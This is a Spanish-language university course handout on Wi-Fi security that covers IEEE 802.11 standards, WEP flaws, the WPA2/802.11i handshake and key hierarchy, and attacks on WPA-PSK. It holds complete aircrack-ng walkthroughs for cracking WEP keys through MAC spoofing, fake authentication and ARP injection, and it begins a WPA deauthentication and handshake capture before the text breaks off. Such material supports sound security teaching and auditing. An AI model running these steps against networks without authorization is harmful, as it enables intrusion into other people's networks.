Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

Seguridad de Redes Inalmbricas

Introduccin
En este curso se empezara a conocer algunos estndares y en especifico el estndar IEEE
802.11b/g, como tambin veremos modos de encriptacin, problemas, ventajas y desventajas
de cada tipo de cifrado al igual que su respectiva auditoria, tanto como para WEP, WPA y
WPA2.
802.11
Estndares Inalmbricos. Pasado, presente y futuro de las redes wireless.
Los estndares son usados por los vendedores para garantizarles a sus clientes un nivel de
seguridad, calidad, y consistencia en sus productos. Para el cliente, un producto que sigue un
estndar especfico implica la posibilidad de interoperabilidad con otros productos y de no estar
atado a un vendedor nico.

IEEE y sus grupos de trabajo

El Instituto de Ingenieros Elctricos y Electrnicos IEEE es una organizacin internacional sin
fines de lucro, lder en el campo de la promocin de estndares internacionales,
particularmente en el campo de las telecomunicaciones, la tecnologa de informacin y la
generacin de energa. IEEE tiene en su haber 900 estndares activos y otros 400 en
desarrollo. Algunos de los productos del IEEE ms conocidos son el grupo de estndares para
redes LAN/MAN IEEE 802 que incluye el de Ethernet (IEEE 802.3) y el de redes inalmbricas
(IEEE 802.11). La actividad del IEEE se realiza a travs de grupos de trabajo integrados por
voluntarios internacionales que se renen varias veces al ao para discutir y votar las
propuestas, a menudo con encarnizados debates por los intereses comerciales involucrados.

IEEE 802.11
Redes Ethernet Inalmbricas
Este estndar define y gobierna las redes de rea local inalmbricas WLAN que operan en el
espectro de los 2,4 GHz (Giga Hercios) y fue definida en 1997. El estndar original
especificaba la operacin a 1 y 2 Mbps usando tres tecnologas diferentes:

Frecuency Hopping Spread Spectrum FHSS

Direct Secuence Spread Spectrum DSSS

Infrarojos IR

El estndar original aseguraba la interoperabilidad entre equipos de comunicacin dentro de

cada una de estas tecnologas inalmbricas, pero no entre las tres tecnologas. Desde
entonces, muchos estndares han sido definidos dentro de la especificacin IEEE 802.11 que
permiten diferentes velocidades de operacin. El estndar IEEE 802.11b permite operar hasta
11Mbps y el 802.11a, que opera a una frecuencia mucho mayor (5 GHz), permite hasta
54Mbps.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
IEEE 802.11b
Ethernet Inalmbrico de alta velocidad
Este extensin del estndar 802.11, definido en 1999, permite velocidades de 5,5 y 11Mbps en
el espectro de los 2,4GHz. Esta extensin es totalmente compatible con el estndar original de
1 y 2 Mbps (slo con los sistemas DSSS, no con los FHSS o sistemas infrarojos) pero incluye
una nueva tcnica de modulacin llamada Complementary Code Keying (CCK), que permite el
incremento de velocidad. El estndar 802.11b define una nica tcnica de modulacin para las
velocidades superiores - CCK - al contrario que el estndar original 802.11 que permita tres
tcnicas diferentes (DSSS, FHSS e infrarojos). De este modo, al existir una nica tcnica de
modulacin, cualquier equipo de cualquier fabricante podr conectar con cualquier otro equipo
si ambos cumplen con la especificacin 802.11b. Esta ventaja se ve reforzada por la creacin
de la organizacin llamada WECA Wireless Ethernet Compatibility Alliance, una organizacin
que dispone de un laboratorio de pruebas para comprobar equipos 802.11b. Cada equipo
certificado por la WECA recibe el logo de compatibilidad WI-FI que asegura su compatibilidad
con el resto de equipos certificados.

IEEE 802.11b+
Pseudo estndar de 22Mbps
Es una variacin del IEEE 802.11b pero que puede operar a 22Mbps contra los 11Mbps de la
versin 11b. Su mayor problema es que no es un estndar. Aunque aparece en la mayora de
las documentaciones como IEEE 802.11b+, IEEE nunca lo ha certificado como estndar. Es un
sistema propietario diseado por Texas Instruments y adoptado por algunos fabricantes de
dispositivos inalmbricos como D-Link y Global Sun que utilizan estos chipsets. Tcnicamente
utiliza tcnicas que forman parte del estndar 11g. Comparativamente con el resto de
estndares no ofrece grandes diferencias, ya que aunque anuncia velocidades de 22Mbps en
prestaciones reales se obtiene una discreta mejora.
IEEE 802.11g
Velocidades de 54Mbps en la banda de 2,4GHz
El estndar IEEE 802.11g ofrece 54Mbps en la banda de 2,4GHz. Dicho con otras palabras,
asegura la compatibilidad con los equipos Wi-Fi preexistentes. Para aquellas personas que
dispongan de dispositivos inalmbricos de tipo Wi-Fi, 802.11g proporciona una forma sencilla
de migracin a alta velocidad, extendiendo el perodo de vida de los dispositivos de 11Mbps. El
estndar 802.11g se public como borrador en Noviembre de 2001 con los siguientes
elementos obligatorios y opcionales:

Mtodo OFDM Orthogonal Frecuancy Division Multiplexing es obligatorio y es lo que

permite velocidades superiores en la banda de los 2,4GHz.

Los sistemas deben ser totalmente compatibles con las tecnologas anteriores de
2,4GHz Wi-Fi (802.11b). Por lo que el uso del mtodo CCK Complementary Code
Keying tambin ser obligatorio para asegurar dicha compatibilidad.

El borrador del estndar marca como opcional el uso del mtodo PBCC Packet Binary
Convolution Coding y el OFDM/CCK simultneo.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
WEP, WPA y WPA2
Aun cuando se activen las medidas de seguridad en los aparatos Wi-Fi, se utiliza un protocolo
de encriptacin dbil, como WEP. En este curso, examinaremos las debilidades de WEP y
veremos lo sencillo que es crackear el protocolo. La lamentable inadecuacin de WEP
resalta la necesidad de una nueva arquitectura de seguridad en el estndar 802.11i, por lo que
tambin estudiaremos la puesta en prctica de WPA y WPA2 junto a sus primeras
vulnerabilidades menores y su integracin en los sistemas operativos.
R.I.P. WEP
WEP (Wired Equivalent Privacy) fue el primer protocolo de encriptacin introducido en el primer
estndar IEEE 802.11 all por 1999. Est basado en el algoritmo de encriptacin RC4, con una
clave secreta de 40 o 104 bits, combi- nada con un Vector de Inicializacin (IV) de 24 bits para
encriptar el mensaje de texto M y su checksum el ICV (Integrity Check Value). El mensaje
encriptado C se determinaba utilizan- do la siguiente frmula:
C = [ M || ICV(M) ] + [ RC4(K || IV) ]
Donde || es un operador de concatenacin y + es un operador XOR. Claramente, el vector de
inicializacin es la clave de la seguridad WEP, as que para mantener un nivel decente de
seguridad y minimizar la difusin, el IV debe ser aplicado a cada paquete, para que los
paquetes subsiguientes estn encriptados con claves diferentes. Desafortunadamente para la
seguridad WEP, el IV es transmitido en texto simple, y el estndar 802.11 no obliga a la
incrementacin del IV, dejando esta medida de seguridad como opcin posible para una
terminal inalmbrica particular (punto de acceso o tarjeta inalmbrica).

Figura 1. Protocolo de encriptacin WEP

Breve historia de WEP
El protocolo WEP no fue creado por expertos en seguridad o criptografa, as que pronto se
demostr que era vulnerable ante los problemas RC4 descritos por David Wagner cuatro aos
antes. En 2001, Scott Fluhrer, Itsik Mantin y Adi Shamir (FMS para abreviar) publicaron su
famoso artculo sobre WEP, mostrando dos vulnerabilidades en el algoritmo de encriptacin:
debilidades de no-variacin y ataques IV conocidos. Ambos ataques se basan en el hecho de
que para ciertos valores de clave es posible que los bits en los bytes iniciales del flujo de clave
dependan de tan slo unos pocos bits de la clave de encriptacin (aunque normal- mente cada
bit de un flujo de clave tiene una posibilidad del 50% de ser diferente del anterior). Como la

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
clave de encriptacin est compuesta concatenando la clave secreta con el IV, ciertos valores
de IV muestran claves dbiles.
Estas vulnerabilidades fueron aprovechadas por herramientas de seguridad como AirSnort,
permitiendo que las claves WEP fueran descubiertas analizando una cantidad de trfico
suficiente. Aunque este tipo de ataque poda ser desarrollado con xito en una red con mucho
trfico en un plazo de tiempo razonable, el tiempo requerido para el procesamiento de los datos
era bastante largo. David Hulton (h1kari) ide un mtodo optimizado de este mismo ataque,
tomando en consideracin no slo el primer byte de la salida RC4 (como en el mtodo FMS),
sino tambin los siguientes. Esto result en una ligera reduccin de la cantidad de datos
necesarios para el anlisis.
La etapa de comprobacin de integridad tambin sufre de serias debilidades por culpa del
algoritmo CRC32 utilizado para esta tarea. CRC32 se usa normalmente para la deteccin de
errores, pero nunca fue considerado como seguro desde un punto de vista criptogrfico, debido
a su linealidad, algo que Nikita Bori- sov, Ian Goldberg y David Wagner ya haban advertido en
2001.
Desde entonces, se ha acepta- do que WEP proporciona un nivel de seguridad aceptable slo
para usuarios domsticos y aplicaciones no crticas. Sin embargo, incluso eso se desvaneci
con la aparicin de los ataques KoreK en 2004 (ataques generalizados FMS, que incluan
optimizaciones de h1kari), y el ataque inductivo invertido Arbaugh, permitiendo que paquetes
arbitrarios fueran desencriptados sin necesidad de conocer la clave utilizando la inyeccin de
paquetes.
Las herramientas de cracking, como Aircrack de Christophe Devine o WepLab de Jos Ignacio
Snchez, ponen en prctica estos ataques y pueden extraer una clave WEP de
128-bits en menos de 10 minutos (o algo ms, dependiendo del punto de acceso y la tarjeta
wireless especficos).
La incorporacin de la inyeccin de paquetes mejor sustancialmente los tiempos de crackeo
de WEP, requiriendo tan slo miles, en lugar de millones, de paquetes con suficientes IVs
nicos alrededor de 150,000 para una clave WEP de 64-bits y 500,000 para una clave
de 128-bits. Con la inyeccin de paquetes, el obtener los datos necesarios era apenas una
tarea de minutos. En la actualidad, WEP est definitivamente muerto (ver Tabla 1) y no debera
ser utilizado, ni siquiera con rotacin de claves.
Los fallos de seguridad de WEP pueden resumirse tal y como sigue:

debilidades del algoritmo RC4 dentro del protocolo WEP debido a la construccin
de la clave,
los IVs son demasiado cortos (24 bits hacen falta menos de 5000 paquetes para
tener un 50% de posibilidades de dar con la clave) y se permite la reutilizacin de
IV (no hay proteccin contra la repeticin de mensajes),
no existe una comprobacin de integridad apropiada (se utiliza CRC32 para la
deteccin de errores y no es criptogrficamente seguro por su linealidad),
no existe un mtodo integrado de actualizacin de las claves.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
SACANDO CLAVE WEP
1er PASO : Configurar la tarjeta en modo monitor: AIRMON
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng start mon0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
2 PASO: Capturar paquetes: AIRODUMP
airodump-ng mon0 (localizas la red y apunta su mac y su canal)
control-c(Para parar el airodump)
airodump-ng mon0 -w redeswep -c 6 (lo dejas capturando)
3er PASO: Autentificarse de forma falsa : AIREPLAY, en otra consola
aireplay-ng -1 0 -e redeswep -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
si la autentificacion es correcta, debe decir sucessful :) pasas al siguiente paso.
4 PASO : Inyectar paquetes: AIREPLAY
aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0 y cuando llegues a 120000
ARPS: al menos Unos 30000 ARPS recomendado
5 PASO: Buscar clave en el archivo de captura jander.cap : AIRCRACK
aircrack-ng *.cap (en nuestro caso redeswep-01.cap)
KEY FOUND! [ 5A:30:30:30:32:43:46:42:37:35:41:38:32 ] (ASCII: Z0002CFB75A82 )

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
Resumen de comandos WEP/WPA/WPA2
WEP
1-iwconfig ; al igual que airmon-ng nos muestra las informacin de las interfaces que tenemos
2-airmon-ng stop wlan0 ;detendr el funcionamiento de nuestra la Wlan0
3-macchanger -m 00:11:22:33:44:55 wlan0 ; Nos cambia la MAC de nuestra Wlan0 de forma
virtual (proceso seguro aunque una autentificacin lenta)
4-airmon-ng start wlan0 ; ponemos nuestra Wlan0 en modo monitor o promiscuo
5-airodump-ng mon0 ; verificamos las Redes que tenemos al alcance y vemos la red de mayor
potencia para atacarlo
6-airodump-ng -w ESSID --bssid BSSID --channel x mon0 ; una vez seleccionada la RED
victima procedemos a la Captura de Paquetes
7-aireplay-ng -1 0 -e ESSID -a BSSID -h 00:11:22:33:44:55 mon0 ; Para autenticarnos de forma
falsa
8-aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 mon0 ; ahora inyectamos paquetes viendo
como mnimo 30000 ARPs
9-dir ; nos mostrara los archivos guardados en la que identificamos las extensiones *.cap que
contiene la contrasea WEP
9-aircrack-ng redes-01.cap; Interpretara el contenido del Archivo *.cap para mostrarnos la
contrasea de la red victima
Metodo Resumido
airmon-ng
airmon-ng start wlan0
airmon-ng
airodump-ng mon0
airodump-ng w redes -c 6 --bssid 00:00:00:00:00:00 mon0
aireplay-ng -1 0 -a 00:00:00:00:00:00 mon0
aireplay-ng -3 b 00:00:00:00:00:00 mon0
dir
aircrack-ng redes-01.cap

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
En enero de 2001, el grupo de trabajo i task group fue creado en IEEE
seguridad en la autenticacin y la encriptacin de datos. En abril de 2003,
(una asociacin que pro- mueve y certifica Wi-Fi) realiz una recomendacin
a las preocupaciones empresariales ante la seguridad inalmbrica. Sin
conscientes de que los clientes no querran cambiar sus equipos.

para mejorar la
la Wi-Fi Alliance
para responder
embargo, eran

En junio de 2004, la edicin final del estndar 802.11i fue adoptada y recibi el nombre
comercial WPA2 por parte de la alianza Wi-Fi. El estndar IEEE 802.11i introdujo varios
cambios fundamentales, como la separacin de la autenticacin de usuario de la integridad y
privacidad de los mensajes, proporcionando una arquitectura robusta y escalable, que sirve
igualmente para las redes locales domsticas como para los grandes entornos de red
corporativos. La nueva arquitectura para las redes wireless se llama Robust Security Network
(RSN) y utiliza autenticacin 802.1X, distribucin de claves robustas y nuevos mecanismos de
integridad y privacidad.

Figura 2. Modelo de IEEE 802.1X segn la especificacin IEEE 802.1X

Adems de tener una arquitectura ms compleja, RSN proporciona soluciones seguras y

escalables para la comunicacin inalmbrica. Una RSN slo aceptar mquinas con
capacidades RSN, pero IEEE
802.11i tambin define una red transicional de seguridad Transitional Security Network
(TSN), arquitectura en la que pueden participar sistemas RSN y WEP, permitiendo a los
usuarios actualizar su equipo en el futuro. Si el proceso de autenticacin o asociacin entre
estaciones utiliza
4-Way handshake, la asociacin recibe el nombre de RSNA (Robust Security Network
Association).

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
El establecimiento de un contexto seguro de comunicacin consta de cuatro fases (ver Figura
3):

Figura 3. Fases operacionales de 802.11i

acuerdo sobre la poltica de se- guridad,

autenticacin 802.1X
derivacin y distribucin de las claves,
confidencialidad e integridad de los datos RSNA.

Fase 1: Acuerdo sobre la poltica de seguridad

La primera fase requiere que los participantes estn de acuerdo sobre la poltica de seguridad
a utilizar. Las polticas de seguridad soportadas por el punto de acceso son mostradas en un
mensaje Beacon o Probe Response (despus de un Probe Request del cliente). Sigue a esto
una autenticacin abierta estndar (igual que en las redes TSN, donde la autenticacin siempre
tiene xito). La respuesta del cliente se incluye en el mensaje de Association Request validado
por una Association Response del punto de acceso. La informacin sobre la poltica de
seguridad se enva en el campo RSN IE (Information Element) y detalla:

los mtodos de autenticacin soportados (802.1X, Pre-Shared Key (PSK)),

protocolos de seguridad para el trfico unicast (CCMP, TKIP etc.) la suit
criptogrfica basada en pares,
protocolos de seguridad para el trfico multicast (CCMP, TKIP etc.) suit
criptogrfica de grupo,
soporte para la pre-autenticacin, que permite a los usuarios pre-autenticarse
antes de cambiar de punto de acceso en la misma red para un funciona- miento sin
retrasos.

La Figura 4 ilustra esta primera fase.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

Figura 4. Fase 1: Acuerdo sobre la poltica de seguridad

Fase 2: autenticacin 802.1X
La segunda fase es la autenticacin 802.1X basada en EAP y en el mtodo especfico de
autenticacin decidido: EAP/TLS con certificados de cliente y servidor (requiriendo una
infraestructura de claves pblicas), EAP/TTLS o PEAP para autenticacin hbrida (con
certificados slo requeridos para servidores), etc. La autenticacin 802.1X se inicia cuando el
punto de acceso pide datos de identidad del cliente, y la respuesta del cliente incluye el mtodo
de autenticacin preferido. Se intercambian entonces mensajes apropiados entre el cliente y
el servidor de autenticacin para generar una clave maestra comn (MK). Al final del proceso,
se enva desde el servidor de autenticacin al punto de acceso un mensaje Radius Accept, que
contiene la MK y un mensaje final EAP Success para el cliente.
La Figura 5 ilustra esta segunda fase.

Figura 5 Fase 2: autenticacin 802.1X

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
Fase 3: jerarqua y distribucin de claves
La seguridad de la conexin se basa en gran medida en las claves secretas. En RSN, cada
clave tiene una vida determinada y la seguridad global se garantiza utilizando un conjunto de
varias claves organizadas segn una jerarqua. Cuando se establece un contexto de seguridad
tras la autenticacin exitosa, se crean claves temporales de sesin y se actualizan
regularmente hasta que se cierra el contexto de seguridad. La generacin y el intercambio de
claves es la meta de la tercera fase. Durante la derivacin de la clave, se producen dos
handshakes (vase Figura 6):

Figura 6. Fase 3: derivacin y distribucin de claves

4-Way Handshake para la de- rivacin de la PTK (Pairwise Transient Key) y GTK
(Group Transient Key),
Group Key Handshake para la renovacin de GTK.

La derivacin de la clave PMK (Pairwise Master Key) depende del mtodo de autenticacin:

si se usa una PSK (Pre-Shared Key), PMK = PSK. La PSK es generada desde una
passphra- se (de 8 a 63 caracteres) o una cadena de 256-bit y proporciona una
solucin para redes doms- ticas o pequeas empresas que no tienen servidor de
autentica- cin,
si se usa un servidor de autenti- cacin, la PMK es derivada de la MK de
autenticacin 802.1X.

La PMK en si misma no se usa nunca para la encriptacin o la comprobacin de integridad. Al

contrario, se usa para generar una clave de encriptacin temporal para el trfico unicast esta
es la PTK (Pairwise Transient Key). La longitud de la PTK depende el protocolo de
encriptacin: 512 bits para TKIP y 384 bits para CCMP. La PTK consiste en varias claves
temporales dedicadas:

KCK (Key Confirmation Key 128 bits): Clave para la autenticacin de mensajes
(MIC) durante el 4- Way Handshake y el Group Key Handshake,
KEK (Key Encryption Key 128 bits): Clave para asegurar la confidencialidad de
los datos durante el 4-Way Handshake y el Group Key Handshake,

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

TK (Temporary Key 128 bits): Clave para encriptacin de datos (usada por TKIP
o CCMP),
TMK (Temporary MIC Key 2x64 bits): Clave para la autenticacin de datos (usada
slo por Michael con TKIP). Se usa una clave dedicada para cada lado de la
comunicacin.

Esta jerarqua se resume en la Fi- gura 7

Figura 8. Fase 3: jerarqua de clave por parejas

El 4-Way Handshake, iniciado por el punto de acceso, hace posible:

confirmar que el cliente conoce la

PMK,
derivar una PTK nueva,
instalar claves de encriptacin e integridad,
encriptar el transporte de la GTK,
confirmar la seleccin de la suite de cifrado.

Se intercambian cuatro mensajes EAPOL-Key entre el cliente y el punto de acceso durante el

4-Way Handshake.
Esto se muestra en la Figura 8.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

igura 8. Fase 3: 4-Way Handshake

La PTK se deriva de la PMK, una cadena fija, la direccin MAC del punto de acceso, la
direccin MAC del cliente y dos nmeros aleatorios (ANonce y SNonce, generados por el
autenticador y el suplicante, respectivamente). El punto de acceso inicia el primer mensaje
seleccionando el nmero aleatorio ANonce y envindoselo al suplicante, sin encriptar el
mensaje o protegerlo de las trampas. El suplicante genera su propio nmero aleatorio SNonce
y ahora puede calcular la PTK y las claves temporales derivadas, as que enva el SNonce y la
clave MIC calculada del segundo mensaje usando la clave KCK. Cuando el autenticador recibe
el segundo mensaje, puede extraer el SNonce (porque el mensaje no est encriptado) y
calcular la PTK y las claves temporales derivadas. Ahora puede verificar el valor de MIC en el
segundo mensaje y estar seguro de que el suplicante conoce la PMK y ha calculado
correctamente la PTK y las claves temporales derivadas.
El tercer mensaje enviado por el autenticador al suplicante contiene el GTK (encriptada con la
clave KEK), derivada de un GMK aleatorio y GNonce (ver Figura 10), junto con el MIC
calculado del tercer mensaje utilizando la clave KCK. Cuando el suplicante recibe este
mensaje, el MIC se comprueba para asegurar que el autenticador conoce el PMK y ha
calculado correctamente la PTK y derivado claves temporales.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
El ltimo mensaje certifica la finalizacin del handshake e indica que el suplicante ahora
instalar la clave y empezar la encriptacin. Al recibirlo, el autenticador instala sus claves tras
verificar el valor MIC. As, el sistema mvil y el punto de acceso han obtenido, calculado e
instalado unas claves de integridad y encriptacin y ahora pueden comunicarse a travs de un
canal seguro para trfico unicast y multicast.
El trfico multicast se protege con otra clave: GTK (Group Transient Key), generada de una
clave maestra llamada GMK (Group Master Key), una cadena fija, la direccin MAC del
punto de acceso y un nmero aleatorio GNonce. La longitud de GTK depende del protocolo de
encriptacin 256 bits para TKIP y128 bits para CCMP. GTK se divide en claves temporales
dedicadas:

GEK (Group Encryption Key): Clave para encriptacin de datos (usada por CCMP
para la auten- ticacin y para la encriptacin, y por TKIP),
GIK (Group Integrity Key): Clave para la autenticacin de datos (usada solamente
por Michael con TKIP).

Esta jerarqua se resume en la Fi- gura 9.

Figura 10. Fase 3: jerarqua de Group Key

Se intercambian dos mensajes EAPOL-Key entre el cliente y el pun- to de acceso durante el
Group Key Handshake. Este handshake hace uso de claves temporales generadas durante el
4-Way Handshake (KCK y KEK).
El proceso se muestra en la Figura 10.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

Figura 10. Fase 3: Group Key Handshake

El Group Key Handshake slo se requiere para la disasociacin de una estacin o para
renovar la GTK, a peticin del cliente. El autenticador inicia el primer mensaje escogiendo el
nmero aleatorio GNonce y calculando una nueva GTK. Enva la GTK encriptada (usando
KEK), el nmero de secuencia de la GTK y el MIC calculado de este mensaje usando KCK al
suplicante. Cuando el mensaje es recibido por el suplicante, se verifica el MIC y la GTK puede
ser desencriptada.
El segundo mensaje certifica la finalizacin del Group Key Handshake enviando el nmero
de secuencia de GTK y el MIC calculado en este segundo mensaje. Al ser recibido este, el
autenticador instala la nueva GTK (tras verificar el valor MIC).
Tambin existe un STAkey Handshake, pero no lo vamos a tratar aqu. Soporta la
generacin de una clave, llamada STAkey, por el punto de acceso para conexiones ad-hoc.

Fase 4: Confidencialidad e integridad de datos RSNA

Todas las claves generadas anteriormente se
confidencialidad e integridad de datos RSNA:

usan en protocolos que soportan la

TKIP (Temporal Key Hash),

CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code
Protocol),
WRAP (Wireless Robust Authenticated Protocol).

Hay un concepto importante que debe ser entendido antes de detallar estos protocolos: la
diferencia entre MSDU (MAC Service Data Unit) y MPDU (MAC Protocol Data Unit). Ambos
trminos se refieren a un slo paquete de datos, pero MSDU representa a los datos antes de
la fragmentacin, mientras las MPDUs son mltiples unidades de datos tras la fragmentacin.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
La diferencia es importante en TKIP y en el protocolo de encriptacin CCMP, ya que en TKIP el
MIC se calcula desde la MSDU, mientras que en CCMP se calcula desde MPDU.
Al igual que WEP, TKIP est basada en el algoritmo de encriptacin RC4, pero esto es as tan
slo por un motivo: permitir a los sistemas WEP la actualizacin para instalar un protocolo ms
seguro. TKIP se requiere para la certificacin WPA y se incluye como parte de RSN 802.11i
como una opcin. TKIP aade medidas correctoras para cada una de las vulnerabilidades de
WEP descritas anteriormente:

integridad de mensaje: un nuevo MIC (Message Integrity Code) basado en el

algoritmo Michael puede ser incorporado en el soft- ware para microprocesadores
lentos,
IV: nuevas reglas de seleccin para los valores IV, reutilizando IV como contador
de repeticin

(TSC, o TKIP Sequence Counter) e incrementando el valor del IV para evitar la reutilizacin,

Per Packet Key Mixing: para unir claves de encriptacin aparente- mente
inconexas,
gestin de claves: nuevos mecanismos para la distribucin y modificacin de
claves.

TKIP Key-Mixing Scheme se divide en dos fases. La primera se ocupa de los datos estticos
la clave TEK de sesin secreta, el TA de la direccin MAC del transmisor (incluido para
prevenir colisiones IV) y los
32 bits ms altos del IV. La fase 2 incluye el resultado de la fase 1 y los
16 bits ms bajos del IV, cambiando todos los bits del campo Per Packet Key para cada nuevo
IV. El valor IV siempre empieza en 0 y es incrementado de uno en uno para cada paquete
enviado, y los mensajes cuyo TSC no es mayor que el del ltimo mensaje son rechazados. El
resultado de la fase 2 y parte del IV extendido (adems de un bit dummy) componen la entrada
para RC4, generando un flujo de clave que es XOR-eado con el MPDU de slo texto, el MIC
calculado del MPDU y el viejo ICV de WEP (ver Figura 11).

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

Figura 11. Esquema y encriptacin de TKIP Key-Mixing

La computacin del MIC utiliza el algoritmo Michael de Niels Ferguson. Se cre para TKIP y
tiene un nivel de seguridad de 20 bits (el algo- ritmo no utiliza multiplicacin por razones de
rendimiento, porque debe ser soportado por el viejo hardware de red para que pueda ser
actualizado a WPA). Por esta limitacin, se necesitan contramedidas para evitar la falsificacin
del MIC. Los fallos de MIC deben ser menores que 2 por minuto, o se producir una
desconexin de 60 segundos y se establecern nuevas claves GTK y PTK tras ella. Michael
calcula un valor de comprobacin de 8 octetos llamado MIC y lo aade a la MSDU antes de la
transmisin. El MIC se calcula de la direccin origen (SA), direccin de destino (DA), MSDU de
slo texto y la TMK apropiada (dependiendo del lado de la comunicacin, se utilizar una clave
diferente para la transmisin y la recepcin).
CCMP se basa en la suite de cifrado de bloques AES (Advanced Encryption Standard) en su
modo de operacin CCM, con la clave y los bloques de 128 bits de longitud. AES es a CCMP lo
que RC4 a TKIP, pero al contrario que TKIP, que se dise para acomodar al hardware WEP
existente, CCMP no es un compromiso, sino un nuevo diseo de protocolo. CCMP utiliza el
counter mode junto a un mtodo de autenticacin de mensajes llamado Cipher Block Chaining
(CBC-MAC) para producir un MIC.
Se aadieron algunas caractersticas interesantes, como el uso de una clave nica para la
encriptacin y la autenticacin (con diferentes vectores de inicializacin), el cubrir datos no
encriptados por la autenticacin. El protocolo CCMP aade 16 bytes al MPDU, 8 para el
encabezamiento CCMP y 8 para el MIC. El encabezamiento CCMP es un campo no encriptado
incluido entre el encabezamiento MAC y los datos encriptados, incluyendo el PN de 48- bits
(Packet Number = IV Extendido) y la Group Key KeyID. El PN se incrementa de uno en uno
para cada MPDU subsiguiente La computacin de MIC utiliza el algoritmo CBC-MAC que
encripta un bloque nonce de inicio (computado desde los campos de Priority, la direccin
fuente de MPDU y el PN incrementado) y hace XORs sobre los bloques subsiguientes para
obtener un MIC final de 64 bits (el MIC final es un bloque de 128-bits, ya que se descartan los
ltimos 64 bits). El MIC entonces se aade a los datos de texto para la encriptacin AES en
modo contador. El contador se construye de un nonce similar al del MIC, pero con un campo de
contador extra inicializado a 1 e incrementado para cada bloque.

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
El ltimo protocolo es WRAP, basado tambin en AES pero utilizando el esquema de
encriptacin autenticada OCB (Offset Codebook Mode encriptacin y autenticacin en la
misma operacin). OCB fue el primer modo elegido por el grupo de trabajo de IEEE 802.11i,
pero se abandon por motivos de propiedad intelectual y posibles licencias. Entonces se
adopt CCMP como obligatorio.
Debilidades de WPA/WPA2
Aunque se han descubierto algunas pequeas debilidades en WPA/ WPA2 desde su
lanzamiento, ninguna de ellas es peligrosa si se siguen unas mnimas recomendaciones de
seguridad.
La vulnerabilidad ms prctica es el ataque contra la clave PSK de WPA /WPA2. Como ya
hemos dicho, la PSK proporciona una alternativa a la generacin de 802.1X PMK usando un
servidor de autenticacin. Es una cadena de 256 bits o una frase de 8 a 63 caracteres, usada
para generar una cadena utilizando un algoritmo conocido: PSK = PMK = PBKDF2(frase, SSID,
SSID length, 4096, 256), donde PBKDF2 es un mtodo utilizado en PKCS # 5, 4096 es el
nmero de hashes y 256 la longitud del resulta- do. La PTK es derivada de la PMK utilizando
el 4-Way Handshake y toda la informacin utilizada para calcular su valor se transmite en
formato de texto.
La fuerza de PTK radica en el valor de PMK, que para PSK significa exactamente la solidez de
la frase. Como indica Robert Moskowitz, el segundo mensaje del 4-Way Handshake podra
verse sometido a ataques de diccionario o ataques offline de fuerza bruta. La utilidad cowpatty
se cre para aprovechar este error, y su cdigo fuente fue usado y mejorado por Christophe
Devine en Aircrack para permitir este tipo de ataques sobre WPA. El diseo del protocolo (4096
para cada intento de frase) significa que el mtodo de la fuerza bruta es muy lento (unos
centenares de frases por segundo con el ltimo procesador simple). La PMK no puede ser
precalculada (y guardada en tablas) porque la frase de acceso est codificada adicionalmente
segn la ESSID. Una buena frase que no est en un diccionario (de unos 20 caracteres) debe
ser escogida para protegerse eficazmente de esta debilidad.
Para hacer este ataque, el ata- cante debe capturar los mensajes de 4-Way Handshake
monitorizando pasivamente la red inalmbrica o utilizar el ataque de desautenticacin para
acelerar el proceso.
De hecho, los dos primeros mensajes se necesitan para poder intentar adivinar los valores
de PSK. Recordemos que PTK = PRF- X (PMK, Pairwise key expansion, Min(AP_Mac, STA
_Mac) || Max(AP_ Mac, STA _Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce)),
donde PMK es igual a PSK en nuestro caso. Tras el segundo men- saje, el atacante conoce
ANonce (del primer mensaje) y SNonce (del segundo mensaje) y puede empezar a intentar
calcular el valor PSK para calcular PTK y derivar claves temporales. Si se adivina
correctamente la PSK, el MIC del segundo mensaje podra obtenerse con el correspondiente
KCK y si no se consigue, hay que seguir intentando adivinarla.
Como ejemplo prctico, empe- zamos al igual que lo hicimos en el ejemplo de crackeado
de WEP

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
SACANDO CLAVE WAP-WAP2
1er Paso : Configurar la tarjeta :AIRMON
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng start mon0
2 Paso : Capturar paquetes: AIRODUMP
airodump-ng mon0
cuando veas tu punto de acceso a atacar, control-c y en otra consola :
airodump-ng -c 6 --bssid 00:13:F7:1D:B6:CF w redeswpa mon0
3er Paso: Deautentificar : AIREPLAY en otra consola
aireplay-ng -0 10 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0
Despus de usar este comando, fijaros de vez en cuando en la pantalla del airodump, ARRIBA
